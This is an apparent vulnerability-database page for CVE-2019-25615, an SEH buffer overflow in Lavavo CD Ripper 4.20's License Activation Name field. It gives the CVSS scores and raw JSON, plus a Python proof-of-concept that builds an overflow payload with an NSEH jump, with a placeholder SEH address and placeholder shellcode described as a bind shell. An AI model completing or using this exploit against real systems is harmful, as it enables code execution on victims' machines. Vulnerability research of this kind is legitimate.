Security Vulnerability Report
CVE-2019-25615 CVSS 8.4 HIGH

Published: 2026-03-22 14:16:30
Last Modified: 2026-04-16 16:19:51

Description

Lavavo CD Ripper 4.20 contains a structured exception handling (SEH) buffer overflow vulnerability that allows local attackers to execute arbitrary code by supplying a malicious string in the License Activation Name field. Attackers can craft a payload with controlled buffer data, NSEH jump instructions, and SEH handler addresses to trigger code execution and establish a bind shell on port 3110.

CVSS Details

CVSS Score: 8.4
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Lavavo CD Ripper 4.20

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
# PoC for CVE-2019-25615 - Lavavo CD Ripper SEH Buffer Overflow
# This script generates a malicious string to trigger the overflow and bind shell on port 3110.
import socket
import sys

# Configuration
HOST = '127.0.0.1'  # Target IP (Local)
PORT = 3110  # Target Port for Bind Shell (as per description)

# Payload structure
# Offset to SEH (Example value, needs adjustment based on debugging)
offset = 4108

# NSEH (Next SEH) - Short jump to skip SEH handler and land in shellcode
# \xeb\x06 is JMP SHORT +6, \x90\x90 is NOP padding
nseh = b"\xeb\x06\x90\x90"

# SEH Handler - Address of POP POP RET instruction
# This address is module specific and needs to be found for the target version
seh = b"\x21\x21\x21\x21"  # Placeholder address

# Shellcode - msfvenom bind shell on port 3110 (Example)
# windows/shell_bind_tcp LPORT=3110
shellcode = b"\x90\x90\x90\x90"  # NOP sled
shellcode += b"\xcc\xcc\xcc\xcc"  # Int3 placeholder for actual shellcode

padding = b"A" * (offset - len(shellcode))

# Construct the full payload
payload = padding + shellcode + nseh + seh + b"C" * 500

print(f"[*] Generating payload with length: {len(payload)}")
print(f"[*] Payload: {payload}")

# Note: Since this is a local application input field vulnerability,
# the payload would typically be pasted into the 'License Activation Name' field.
# If the application listens on a port, use socket send.
try:
    # Example of sending if it were a network service (Conceptual)
    # s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # s.connect((HOST, 80))  # Assuming HTTP or specific app port
    # s.send(payload)
    # s.close()
    print("[+] Payload generated successfully. Paste into the vulnerable field.")
except Exception as e:
    print(f"[-] Error: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2019-25615", "sourceIdentifier": "[email protected]", "published": "2026-03-22T14:16:30.117", "lastModified": "2026-04-16T16:19:50.757", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Lavavo CD Ripper 4.20 contains a structured exception handling (SEH) buffer overflow vulnerability that allows local attackers to execute arbitrary code by supplying a malicious string in the License Activation Name field. Attackers can craft a payload with controlled buffer data, NSEH jump instructions, and SEH handler addresses to trigger code execution and establish a bind shell on port 3110."}, {"lang": "es", "value": "Lavavo CD Ripper 4.20 contiene una vulnerabilidad de desbordamiento de búfer de manejo estructurado de excepciones (SEH) que permite a atacantes locales ejecutar código arbitrario al proporcionar una cadena maliciosa en el campo License Activation Name. Los atacantes pueden crear una carga útil con datos de búfer controlados, instrucciones de salto NSEH y direcciones de gestor SEH para desencadenar la ejecución de código y establecer un bind shell en el puerto 3110."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", 
"modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "references": [{"url": "https://lavavo-cd-ripper.jaleco.com/download", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/46755", "source": "[email protected]"}, {"url": "https://www.lavavosoftware.com", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/lavavo-cd-ripper-local-seh-buffer-overflow", "source": "[email protected]"}]}}